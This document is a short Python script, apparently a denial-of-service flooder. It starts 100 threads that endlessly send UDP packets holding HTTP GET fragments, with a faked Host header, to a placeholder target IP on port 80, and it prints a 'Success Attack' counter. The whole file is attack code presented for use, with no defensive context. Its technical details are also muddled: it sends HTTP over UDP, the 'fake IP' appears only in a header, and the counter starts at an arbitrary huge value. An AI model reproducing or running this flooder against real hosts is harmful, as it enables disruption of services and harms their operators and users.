import socket
import threading

target = "TARGET IP"
fake_ip = "RANDOM IP"
port = 80

attack_num = 999999999

def attack():
    global attack_num
    while True:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.connect((target, port))
        sock.sendto(bytes(f"GET / HTTP/1.1\r\n", 'utf-8'), (target, port))
        sock.sendto(bytes(f"Host: {fake_ip}\r\n\r\n", 'utf-8'), (target, port))
        attack_num += 1
        print(f'Success Attack {target}: {attack_num}')
        sock.close()

for i in range(100):
    thread = threading.Thread(target=attack)
    thread.start()
